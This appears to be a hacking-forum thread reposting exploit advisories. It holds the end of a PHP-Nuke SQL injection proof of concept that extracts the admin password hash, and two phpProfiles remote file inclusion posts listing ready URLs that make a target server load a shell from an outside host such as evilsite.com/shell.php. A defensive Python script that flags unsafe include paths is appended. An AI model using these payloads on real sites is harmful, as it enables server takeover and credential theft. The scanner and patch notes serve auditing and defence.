// With this PoC code I get the md5 hash of the first admin (God) of the nuke_authors table.
// - How to fix it? More information?
//
// You can find a patch on http://www.neosecurityteam.net/foro/
// Also, you can modify the line 143 of mainfile.php, adding one more protection like:
// ==[ mainfile.php old line (143) ]==========================
// [ ]
// if (stripos_clone($postString,'%20union%20') OR stripos_clone($postString,'*/union/*') OR stripos_clone($postString,' union ') OR stripos_clone($postString_64,'%20union%20') OR stripos_clone($postString_64,'*/union/*') OR stripos_clone($postString_64,' union ') OR stripos_clone($postString_64,'+union+')) {
// }
// [ ]
// ==[ end mainfile.php ]=====================================
// ==[ mainfile.php new line (143) ]==========================
// [ ]
// if (stripos_clone($postString,'%20union%20') OR stripos_clone($postString,'*/union/*') OR stripos_clone($postString,' union ') OR stripos_clone($postString_64,'%20union%20') OR stripos_clone($postString_64,'*/union/*') OR stripos_clone($postString_64,' union ') OR stripos_clone($postString_64,'+union+') OR stripos_clone($postString_64,
// '*/UNION ') OR stripos_clone($postString_64, ' UNION/*')) {
// }
// [ ]
// ==[ end mainfile.php ]=====================================
// That's a momentary solution to the problem. I recommend downloading the PHP Nuke 8.0 version in the next days; it is not
// free at the moment.
// - References
//
// http://www.neosecurityteam.net/index.php?action=advisories&id=27
// - Credits
//
// Anti SQL Injection protection bypass by Paisterist -> paisterist.nst [at] gmail [dot] com
// SQL Injection vulnerability in Encyclopedia module discovered by Paisterist -> paisterist.nst [at] gmail [dot] com
// Proof of Concept exploit by Paisterist -> paisterist.nst [at] gmail [dot] com
// [N]eo [S]ecurity [T]eam [NST] - http://www.neosecurityteam.net/
// - Greets
//
// HaCkZaTaN
// K4P0
// Daemon21
// Link
// 0m3gA_x
// LINUX
// nitrous
// m0rpheus
// nikyt0x
// KingMetal
// Knightmare
// Argentina, Colombia, Chile, Bolivia, Uruguay EXISTS!
?>

Black_hat_cr(HCE)

phpProfiles 2.1 Beta Multiple Remote File Include Vulnerabilities

PHP Code:
#==================================================================
# phpProfiles (RFI)
#==================================================================
# Info:-
#
# Scripts: phpProfiles
# download : http://sourceforge.net/project/showfiles.php?group_id=176310
# Version : v.2.1 Beta
# Dork & vuln : download scripts and think :)
#
#==================================================================
#Exploit :
#
#http://localhost/path/users/include/body.inc.php?reqpath=http://EvElCoDe.txt?
#http://localhost/path/users/include/body_blog.inc.php?reqpath=http://EvElCoDe.txt?
#http://localhost/path/users/include/upload_ht.inc.php?usrinc=http://EvElCoDe.txt?
#
#==================================================================
#Discovered By : v1per-haCker
#
#Contact : v1per-hacker[at]hotmail.com
#
#XP10_hackEr Team >> www.xp10.com
#SpeciaL PoweR SecuritY TeaM >> www.specialpower.org
#
#Greetz to : | abu_shahad | RooT-shilL | hitler_jeddah | BooB11 | FaTaL |
# | ThE-WoLf-KsA | mohandko | fooooz | maVen | fucker_net |
# | metoovet | MooB | Dr.7zN | ToOoFA | Cold Zero | Afroota |
# | Jean | CoDeR |
#
# Thanks >> /str0ke & www.milw0rm.com & www.google.com
===================================================================
# milw0rm.com [2006-10-30]

sexyvirus(HCE)

phpProfiles <= 3.1.2b Multiple Remote File Include Vulnerabilities

Code:
+
+ phpProfiles <= 3.1.2b Multiple Remote File Include Vulnerabilities
+
+ Affected Software .: phpProfiles <= 3.1.2b
+ Download : http://downloads.sourceforge.net/phpprofiles/phpProfiles_3_1_2.zip
+ Description : "phpProfiles allows you to offer visitors their very own URL on your web site simply by registering"
+ Class : Remote File Inclusion
+ Risk : High (Remote File Execution)
+ Found By : nuffsaid <nuffsaid[at]newbslove.us>
+
+ Details:
+ phpProfiles has several scripts which do not initialize variables before using them to
+ include files, assuming register_globals = on, we can initialize any one of the variables
+ in a query string and include a remote file of our choice.
+
+ Vulnerable Code:
+ include/remove_pic.inc.php line(s) 11: include("$scriptpath/redirect.php");
+ include/body_admin.inc.php line(s) 03: <p><?include("$menu");?></p>
+ include/account.inc.php, line(s) 09: include("$incpath/footer.inc.php");
+ include/index.inc.php, line(s) 05: include("$incpath/adminerr.inc.php");
+ see below for a list of files affected.
+
+ Proof Of Concept:
+ http://[target]/[path]/include/body.inc.php?menu=http://evilsite.com/shell.php
+ http://[target]/[path]/include/index.inc.php?incpath=http://evilsite.com/shell.php?
+ http://[target]/[path]/include/account.inc.php?action=update&incpath=http://evilsite.com/shell.php?
+ http://[target]/[path]/include/admin_newcomm.inc.php?action=create&incpath=http://evilsite.com/shell.php?
+ http://[target]/[path]/include/header_admin.inc.php?incpath=http://evilsite.com/shell.php?
+ http://[target]/[path]/include/header.inc.php?incpath=http://evilsite.com/shell.php?
+ http://[target]/[path]/include/friends.inc.php?action=invite&incpath=http://evilsite.com/shell.php?
+ http://[target]/[path]/include/menu_u.inc.php?incpath=http://evilsite.com/shell.php?
+ http://[target]/[path]/include/notify.inc.php?action=sendit&incpath=http://evilsite.com/shell.php?
+ http://[target]/[path]/include/body.inc.php?incpath=http://evilsite.com/shell.php?
+ http://[target]/[path]/include/body_admin.inc.php?menu=http://evilsite.com/shell.php
+ http://[target]/[path]/include/body_admin.inc.php?incpath=http://evilsite.com/shell.php?
+ http://[target]/[path]/include/commrecc.inc.php?action=recommend&incpath=http://evilsite.com/shell.php?
+ http://[target]/[path]/include/do_reg.inc.php?incpath=http://evilsite.com/shell.php?
+ http://[target]/[path]/include/comm_post.inc.php?action=post&incpath=http://evilsite.com/shell.php?
+ http://[target]/[path]/include/menu_v.inc.php?incpath=http://evilsite.com/shell.php?
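
The "Details" section of the phpProfiles <= 3.1.2b advisory describes include paths built from variables the script never initializes, which register_globals = on lets a request set. As an added example (not part of the original posts or of phpProfiles), here is a heuristic source audit that flags include/require statements whose path uses a variable with no earlier assignment in the same file. The sample files are constructed around the include lines quoted in the advisory, and `find_unset_include_vars`, `scan` and `fixed.inc.php` are hypothetical names.

```python
import re

# include/require/include_once/require_once up to the terminating semicolon
INCLUDE_RE = re.compile(
    r"\b(?:include|require)(?:_once)?\s*\(?\s*(?P<arg>[^;]*);", re.IGNORECASE)
VAR_RE = re.compile(r"\$([A-Za-z_]\w*)")


def find_unset_include_vars(source):
    """Return [(line_no, var)] for include paths using a variable that has
    no plain assignment ($var = ...) on any earlier line of the same file."""
    findings = []
    lines = source.splitlines()
    for line_no, line in enumerate(lines, start=1):
        match = INCLUDE_RE.search(line)
        if not match:
            continue
        earlier = "\n".join(lines[:line_no - 1])
        for var in VAR_RE.findall(match.group("arg")):
            # "=(?!=)" accepts "$var =" but not the comparison "$var =="
            assigned = re.search(r"\$" + re.escape(var) + r"\s*=(?!=)", earlier)
            if not assigned:
                findings.append((line_no, var))
    return findings


# Constructed sample files; only the include lines are taken from the advisory.
SAMPLES = {
    "include/index.inc.php": (
        "<?php\n"
        'if ($action == "admin") {\n'
        '    include("$incpath/adminerr.inc.php");\n'
        "}\n"
    ),
    "include/body_admin.inc.php": '<p><?include("$menu");?></p>\n',
    # Hypothetical corrected file: the path is set by the script itself.
    "include/fixed.inc.php": (
        "<?php\n"
        "$incpath = dirname(__FILE__);\n"
        'include("$incpath/footer.inc.php");\n'
    ),
}


def scan(samples):
    """Map each file name to its findings, omitting clean files."""
    report = {name: find_unset_include_vars(src) for name, src in samples.items()}
    return {name: hits for name, hits in report.items() if hits}


if __name__ == "__main__":
    for name, hits in scan(SAMPLES).items():
        for line_no, var in hits:
            print(f"{name}:{line_no}: include path uses unset ${var}")
```

The check is per file and purely textual, so a variable assigned from request input still counts as assigned, and one set by a parent script is reported as unset; treat the output as a list of includes to review by hand.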